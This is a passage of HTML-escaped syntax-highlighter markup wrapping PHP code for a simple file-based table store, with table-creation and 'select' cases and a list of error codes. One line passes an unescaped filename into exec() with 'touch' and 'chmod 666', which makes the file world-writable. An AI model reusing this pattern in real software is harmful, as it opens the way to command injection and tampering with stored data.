-webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;16&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;SCHEMA&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exec&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;touch {$fileName};chmod 666 {$fileName}&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;case&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;select&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;/*&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-39&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		&amp;nbsp;&amp;nbsp;Error1 : Command not found&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-40&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		&amp;nbsp;&amp;nbsp;Error2 : Column not found&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-41&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		&amp;nbsp;&amp;nbsp;Error3 : Value not found&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-42&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		&amp;nbsp;&amp;nbsp;Error4 : Table name not found&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-43&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		&amp;nbsp;&amp;nbsp;Error5 : Column count is different&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-44&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		&amp;nbsp;&amp;nbsp;Error6 : table name duplicate&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-45&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;		*/&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-46&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-47&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; 